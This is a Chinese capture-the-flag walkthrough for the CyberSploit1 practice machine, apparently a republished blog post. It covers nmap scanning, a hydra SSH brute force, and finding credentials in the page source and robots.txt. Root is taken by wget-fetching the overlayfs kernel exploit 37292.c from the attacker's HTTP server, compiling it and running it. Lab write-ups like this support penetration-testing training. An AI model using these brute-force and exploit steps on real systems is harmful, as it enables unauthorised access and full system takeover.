当前位置: 首页 > news >正文

靶场通关记录

OSCP系列靶场-Esay-CyberSploit1

总结


getwebshell → 源码注释发现用户名 → robots.txt发现base64密码 → SSH登录

提 权 思 路 → 内网信息收集 → 发现发行版本有点老 → 内核overlayfs提权

准备工作


  • 启动VPN
    获取攻击机IP > 192.168.45.220

  • 启动靶机
    获取目标机器IP > 192.168.176.92

    信息收集-端口扫描


     目标开放端口收集

  • Nmap开放端口扫描2次
  1. ┌──(root㉿Kali)-[/home/bachang/CyberSploit1]

  2. └─# ┌──(root㉿Kali)-[/home/bachang/Blogger]

  3. └─# sudo nmap --min-rate 10000 -p- 192.168.176.92

  4. Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-23 11:45 CST

  5. Nmap scan report for 192.168.176.92

  6. Host is up (0.30s latency).

  7. Not shown: 65533 closed tcp ports (reset)

  8. PORT STATE SERVICE

  9. 22/tcp open ssh

  10. 80/tcp open http

  11. Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

 

通过两次收集到的端口:→22,80

目标端口对应服务探测

  1. # tcp探测

  2. sudo nmap -sT -sV -O -sC -p22,80 192.168.176.92

 

信息收集-端口测试

两个端口的话,通常突破口在80端口

22-SSH端口的信息收集

22-SSH端口版本信息与MSF利用(待定)

通过Nmap探测获得SSH的版本信息,可以尝试利用

  1. # 进入msf # 探测版本为OpenSSH 5.9p1 Debian 5ubuntu1.10

  2. msfconsole

  3. # 搜索对应脚本

  4. msf6 > searchsploit OpenSSH 5.9p1

貌似存在用户枚举,等没思路的时候可以来试试

22-SSH手动登录尝试(失败)

尝试root账户的密码爆破

  1. ssh root@192.168.176.92 -p 22

  2. # 密码尝试

  3. password > root

 22-SSH弱口令爆破(挂着干别的)

尝试root账户的密码爆破,利用工具hydra,线程-t为6

1.hydra -l root -P /usr/share/wordlists/metasploit/password.lst -t 6 -vV 192.168.176.92 ssh -s 22

80-HTTP端口的信息收集

访问 http://192.168.176.92/ 发现不是一个标准的CMS从源码查看开始

信息收集-源码查看
  1. # 包括文章中是否写明一些敏感信息

  2. curl http://192.168.176.92:80

收集到一个用户名信息 itsskv

信息收集-目录扫描
信息收集-目录扫描初步
  1. dirsearch -u http://192.168.176.92:80 -x 302,403

因为扫出了目录,深层次的扫描待选

  1. 信息收集-目录扫描(后缀)

  2. 信息收集-目录扫描(深度/大字典)

  3. 信息收集-目录扫描(深度/大字典后缀)

信息收集-目录访问

/robots.txt端点访问
存在一串代码,推测是加密,带等号尝试用bashe64解密

1.Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=

base64解密

利用kali解密得到了内容,确认是base64加密

  1. ┌──(root㉿Kali)-[/home/bachang/Blogger]

  2. └─# echo "Y3liZXJzcGxvaXR7eW91dHViZS5jb20vYy9jeWJlcnNwbG9pdH0=

  3. " | base64 -d

  4. cybersploit{youtube.com/c/cybersploit}

另外两个端点没东西

漏洞利用-getwebshell

信息泄露getwebshell

已知用户名 itsskv 和 cybersploit{youtube.com/c/cybersploit}
头脑风暴一下,密码会不会和cybersploit{youtube.com/c/cybersploit}有关
之前hyrda可以爆破说明22端口是允许账号密码登录的

22-SSH账号密码登录(成功)

获取账号密码之后利用SSH进行登录

  1. ssh itsskv<span>@192.168.176.92</span> -p22

  2. password &gt; cybersploit (失败)

  3. password &gt; cybersploit{youtube.com/c/cybersploit}(成功)

密码真长,我真的会谢

内网遨游-getshell


FLAG1获取

  1. # 有2个,理论上排除掉第一个,找home下

  2. itsskv<span>@cybersploit-CTF</span>:~$ find / -name local.txt 2&gt;/dev/null

  3. /usr/share/checkbox/jobs/local.txt

  4. /home/itsskv/local.txt

  5. itsskv<span>@cybersploit-CTF</span>:~$ cat /home/itsskv/local.txt

  6. *********************

信息收集-内网基础信息收集

在获取shell之后我们要进行内网信息的收集,都是为了提权做准备

检测操作系统的发行版本
  1. # 确定发行版本 较老

  2. itsskv<span>@cybersploit-CTF</span>:~$ lsb_release -a

  3. No LSB modules are available.

  4. Distributor ID: Ubuntu

  5. Description: Ubuntu 12.04.5 LTS

  6. Release: 12.04

  7. Codename: precise

查看内核版本信息
  1. # 确定内核版本

  2. itsskv<span>@cybersploit-CTF</span>:~$ uname -a

  3. Linux cybersploit-CTF 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 athlon i386 GNU/Linux

确认home目录下用户
  1. itsskv<span>@cybersploit-CTF</span>:~$ ls -al /home

  2. total 16

  3. # 有两个用户

  4. drwxr-xr-x 22 cybersploit cybersploit 4096 Sep 4 2020 cybersploit

  5. drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 itsskv

确认home目录下是否有隐藏文件
  1. # 例如.ssh找密码 ./*_history找历史记录等

  2. itsskv<span>@cybersploit-CTF</span>:~$ ls -al /home/itsskv

  3. # 查看了一下没啥

  4. drwxr-xr-x 20 itsskv itsskv 4096 Sep 4 2020 .

  5. drwxr-xr-x 4 root root 4096 Jun 25 2020 ..

  6. -rw------- 1 itsskv itsskv 0 Sep 4 2020 .bash_history

  7. -rw-r--r-- 1 itsskv itsskv 220 Jun 25 2020 .bash_logout

  8. -rw-r--r-- 1 itsskv itsskv 3486 Jun 25 2020 .bashrc

  9. drwx------ 14 itsskv itsskv 4096 Jun 25 2020 .cache

  10. drwx------ 9 itsskv itsskv 4096 Jun 25 2020 .config

权限提升

Linux提权-内核overlayfs提权尝试

因为发行版本较老,若存在以下情况进行overlayfsLinux Kernel Version提权

系统版本
Linux Kernel Version大于3.13.0小于3.19
UbuntuLinux 15.04
UbuntuLinux 14.10
UbuntuLinux 14.10
UbuntuLinux 12.04
漏洞利用-内核overlayfs提权
  1. msfconsole

  2. msf &gt; searchsploit overlayfs

结合 3.13.0-32的版本信息选择2与3

  1. # 如果想查看msf对应的内容

  2. cat /usr/share/exploitdb/exploits/linux/local/37292.c

将文件保存在当前目录下,方便开启http服务

  1. ┌──(root㉿Kali)-[/home/bachang/CyberSploit1]

  2. └─# cp /usr/share/exploitdb/exploits/linux/local/37292.c ./shell.c

  3. ┌──(root㉿Kali)-[/home/bachang/CyberSploit1]

  4. └─# ls

  5. hydra.restore shell.c

攻击机开启服务

1.sudo python3 -m http.server 80

目标机器

  1. # 首先到具有权限的目录下 如/tmp

  2. itsskv<span>@cybersploit-CTF</span>:~$ cd /tmp

  3. # 下载

  4. itsskv<span>@cybersploit-CTF</span>:/tmp$ wget http://192.168.45.220/shell.c

  1. # 给权限

  2. itsskv<span>@cybersploit-CTF</span>:/tmp$ chmod +x shell.c

  3. # 如果是c的需要进行编译

  4. itsskv<span>@cybersploit-CTF</span>:/tmp$ gcc shell.c -o shell.c

  5. # 运行

  6. itsskv<span>@cybersploit-CTF</span>:/tmp$ ./shell.c

  7. spawning threads

  8. mount #1

  9. mount #2

  10. child threads done

  11. /etc/ld.so.preload created

  12. creating shared library

  13. # whoami

  14. root

提权成功

FLAG2获取

  1. # cat /root/proof.txt

  2. *********************

完结撒花~~~

原文地址: https://bbs.zkaq.cn/t/30873.html

相关文章:

靶场通关记录

OSCP系列靶场-Esay-CyberSploit1 总结 getwebshell → 源码注释发现用户名 → robots.txt发现base64密码 → SSH登录 提 权 思 路 → 内网信息收集 → 发现发行版本有点老 → 内核overlayfs提权 准备工作 启动VPN 获取攻击机IP > 192.168.45.220 启动靶机 获取目标机器I…...

全网最新最全的软件测试面试题

一、前言 与开发工程师相比&#xff0c;软件测试工程师前期可能不会太深&#xff0c;但涉及面还是很广的。 在一年左右的实习生或岗位的早期面试中&#xff0c;主要是问一些基本的问题。 涉及到的知识主要包括MySQL数据库的使用、Linux操作系统的使用、软件测试框架问题、测试…...

如何列出 Ubuntu 和 Debian 上已安装的软件包

当你安装了 Ubuntu 并想好好用一用。但在将来某个时候&#xff0c;你肯定会遇到忘记曾经安装了那些软件包。 这个是完全正常。没有人要求你把系统里所有已安装的软件包都记住。但是问题是&#xff0c;如何才能知道已经安装了哪些软件包&#xff1f;如何查看安装过的软件包呢&a…...

图论---最小生成树问题

在连通网的所有生成树中&#xff0c;所有边的代价和最小的生成树&#xff0c;称为最小生成树。解决最小生成树问题一般有两种算法&#xff1a;Kruskal算法和Prim算法。 Kruskal算法 原理&#xff1a;基本思想是从小到大加入边&#xff0c;是个贪心算法。我们将图中的每个边按…...

elementplus 时间范围选择器限制选择时间范围

<el-date-pickerv-model"form.time" type"daterange"range-separator"-"start-placeholder"开始时间"end-placeholder"结束":disabled-date"disabledDate"calendar-Change"calendarChange" />co…...

【网络】抓包工具Wireshark下载安装和基本使用教程

&#x1f341; 博主 "开着拖拉机回家"带您 Go to New World.✨&#x1f341; &#x1f984; 个人主页——&#x1f390;开着拖拉机回家_Linux,大数据运维-CSDN博客 &#x1f390;✨&#x1f341; &#x1fa81;&#x1f341; 希望本文能够给您带来一定的帮助&#x1…...

Metasequoia 4 水杉3D建模工具 附序列号

Metasequoia 4是一款非常强大的3D水杉建模工具&#xff0c;它基于多边形建模技术&#xff0c;可以用于创建各种对象并支持多种第三方3DCG软件的文件格式&#xff0c;是一款非常适合从爱好到业务&#xff0c;支持3D电脑绘图&#xff0c;3D印刷&#xff0c;游戏开发等的3D建模软件…...

股票杠杆交易平台排名:淘配网推荐的十大平台

在投资世界中&#xff0c;股票杠杆交易一直以其提供更高回报机会的吸引力而备受欢迎。随着市场的不断发展&#xff0c;出现了越来越多的股票杠杆交易平台。本文将为您介绍淘配网推荐的十大股票杠杆交易平台&#xff0c;并分析它们的特点。 富灯网 - 富灯网以其全面的杠杆产品和…...

CoreData + CloudKit 在初始化 Schema 时报错 A Core Data error occurred 的解决

问题现象 如果希望为 CoreData 支持的 App 增加云数据备份和同步功能,那么 CloudKit 是绝佳的选择。CloudKit 会帮我们默默处理好一切,我们基本不用为升级而操心。 不过,有时在用本地 CoreData NSManagedObjectModel 初始化 iCloud 中的 Schema 时会发生如下错误: Error …...

修炼k8s+flink+hdfs+dlink(三:安装dlink)

一&#xff1a;mysql初始化。 mysql -uroot -p123456 create database dinky; grant all privileges on dinky.* to dinky% identified by dinky with grant option; flush privileges;二&#xff1a;上传dinky。 上传至目录/opt/app/dlink tar -zxvf dlink-release-0.7.4.t…...

Linux 系统性能瓶颈分析(超详细)

Author&#xff1a;rab 目录 前言一、性能指标1.1 进程1.1.1 进程定义1.1.2 进程状态1.1.3 进程优先级1.1.4 进程与程序间的关系1.1.5 进程与进程间的关系1.1.6 进程与线程的关系 1.2 内存1.2.1 物理内存与虚拟内存1.2.2 页高速缓存与页写回机制1.2.3 Swap Space 1.3 文件系统1…...

kafka与zookeeper的集群

基础配置 systemctl stop firewalld && systemctl disable firewalld setenforce 0 sed -i s/SELINUXenforcing/SELINUXdisabled/ /etc/selinux/configvi /etc/hosts ip1 node1 ip2 node2 ip3 node3zookeeper介绍 zookeeper是一个分布式的协调服务&#xff0c;主要用…...

sqlalchemy 连接池

报错 sqlalchemy.exc.TimeoutError: QueuePool limit of size 100 overflow 10 reached, connection timed out, timeout 30 (Background on this error at: http://sqlalche.me/e/3o7r) 查看数据库未活动超时时间 show variables like "interactive_timeout";一般…...

用Blender制作YOLO目标检测器训练数据

推荐&#xff1a;用 NSDT编辑器 快速搭建可编程3D场景 本文将介绍一种非常有吸引力的机器学习训练数据的替代方案&#xff0c;用于为给定的特定应用程序收集数据。 无论应用程序类型如何&#xff0c;这篇博文都旨在向读者展示使用 Blender 等开源资源生成合成数据&#xff08;S…...

c++视觉处理---均值滤波

均值滤波 cv::blur()函数是OpenCV中用于应用均值滤波的函数。均值滤波是一种简单的平滑技术&#xff0c;它计算每个像素周围像素的平均值&#xff0c;并用该平均值替代原始像素值。这有助于降低图像中的噪声&#xff0c;并可以模糊图像的细节。 以下是cv::blur()函数的基本用…...

QT基础入门——Qt事件(五)

前言&#xff1a; 事件&#xff08;event&#xff09;是由系统或者 Qt 本身在不同的时刻发出的。当用户按下鼠标、敲下键盘&#xff0c;或者是窗口需要重新绘制的时候&#xff0c;都会发出一个相应的事件。一些事件在对用户操作做出响应时发出&#xff0c;如键盘事件等&#x…...

自学黑客方法-----(网络安全)

如果你想自学网络安全&#xff0c;首先你必须了解什么是网络安全&#xff01;&#xff0c;什么是黑客&#xff01;&#xff01; 1.无论网络、Web、移动、桌面、云等哪个领域&#xff0c;都有攻与防两面性&#xff0c;例如 Web 安全技术&#xff0c;既有 Web 渗透2.也有 Web 防…...

Dockerfile自定义容器

1、Dockerfile Dockerfile 是用于构建 Docker 镜像的文本文件&#xff0c;其中包含一系列的指令和配置&#xff0c;用于定义镜像的构建过程。通过 Dockerfile&#xff0c;你可以定义镜像的基础操作系统、依赖、环境设置、应用程序等信息&#xff0c;从而实现可复制、自动化的镜…...

(5)SpringMVC处理携带JSON格式(“key“:value)请求数据的Ajax请求

SpringMVC处理Ajax 参考文章数据交换的常见格式,如JSON格式和XML格式 请求参数的携带方式 浏览器发送到服务器的请求参数有namevalue&...(键值对)和{key:value,...}(json对象)两种格式 URL请求会将请求参数以键值对的格式拼接到请求地址后面,form表单的GET和POST请求会…...

【iOS】——仿写计算器

文章目录 一、实现思路二、实现方法三、判错处理 一、实现思路 先搭建好MVC框架&#xff0c;接着在各个模块中实现各自的任务。首先要创建好UI界面&#xff0c;接着根据UI界面的元素来与数据进行互动&#xff0c;其中创建UI界面需要用到Masonry布局。 二、实现方法 在calcu…...

公安机关警务vr综合实战模拟训练提高团队合作能力

公安出警VR虚拟仿真培训软件是VR公司利用VR虚拟现实和web3d开发技术&#xff0c;对警务执法过程中可能发生的各种场景进行还原、模拟、演练&#xff0c;结合数据分析&#xff0c;实施量化考核&#xff0c;提高学员的心理承压、应急处突、遇袭反应和临危处置综合能力。 公安出警…...

MySQL-1(12000字详解)

一&#xff1a;数据库的引入 数据库在我们以后工作中是一个非常常用的知识&#xff0c;数据库用来存储数据&#xff0c;但是有些同学可能就会疑惑了&#xff0c;存储数据用文件就可以了&#xff0c;为什么还要弄个数据库呢&#xff1f; 文件保存数据有以下几个缺点&#xff1…...

voc数据集格式与yolo数据集格式的区别及相互转化

Pascal VOC数据集是目标检测领域最常用的标准数据集之一&#xff0c;几乎所有检测方向的论文都会给出其在VOC数据集上训练并评测的效果。VOC数据集包含的信息非常全&#xff0c;它不仅被拿来做目标检测&#xff0c;也可以拿来做分割等任务&#xff0c;因此除了目标检测所需的文…...

超详细!Android Termux上如何安装MySQL,内网穿透实现公网远程访问

文章目录 前言1.安装MariaDB2.安装cpolar内网穿透工具3. 创建安全隧道映射mysql4. 公网远程连接5. 固定远程连接地址 前言 Android作为移动设备&#xff0c;尽管最初并非设计为服务器&#xff0c;但是随着技术的进步我们可以将Android配置为生产力工具&#xff0c;变成一个随身…...

TSNE降维学习

在学习使用Cora数据集时&#xff0c;输入的初始为[2708, 1433], 输入一共有2708个点&#xff0c;每个节点有1433个特征。测试集的大小为[1000, 1433]最后的输出为[1000, 7]&#xff0c;表示每个点的类别。 我们要的就是查看这个[1000, 7]的预测结果。想要将他展示在一个平面上是…...

基于Python+Selenium的web自动化测试框架详解

简介 随着Web应用程序的广泛应用和不断发展&#xff0c;Web自动化测试已经成为软件质量保证中的一个重要环节。而PythonSelenium作为一组强大的工具和框架&#xff0c;已经成为Web自动化测试领域中的热门技术之一。PythonSelenium可以帮助我们快速、准确地模拟用户行为和操作&…...

C (1094) : DS双向链表—前驱后继

Description 在双向链表中&#xff0c;A有一个指针指向了后继节点B&#xff0c;同时&#xff0c;B又有一个指向前驱节点A的指针。这样不仅能从链表头节点的位置遍历整个链表所有节点&#xff0c;也能从链表尾节点开始遍历所有节点。 对于给定的一列数据&#xff0c;按照给定的…...

mp4视频太大怎么压缩变小?

mp4视频太大怎么压缩变小&#xff1f;确实&#xff0c;很多培训和教学都转向了线上模式&#xff0c;这使得我们需要下载或分享大量的在线教学视频。然而&#xff0c;由于MP4视频文件通常较大&#xff0c;可能会遇到无法打开或发送的问题。为了解决这个问题&#xff0c;我们可以…...

利用easy excel 实现文件导出

一.创建实体类 package com.siact.product.jwp.module.report.dto;import com.alibaba.excel.annotation.ExcelProperty; import com.alibaba.excel.annotation.write.style.ColumnWidth; import com.alibaba.excel.annotation.write.style.ContentRowHeight; import com.alib…...

LongLoRA:超长上下文,大语言模型高效微调方法

麻省理工学院和香港中文大学联合发布了LongLoRA&#xff0c;这是一种全新的微调方法&#xff0c;可以增强大语言模型的上下文能力&#xff0c;而无需消耗大量算力资源。 通常&#xff0c;想增加大语言模型的上下文处理能力&#xff0c;需要更多的算力支持。例如&#xff0c;将…...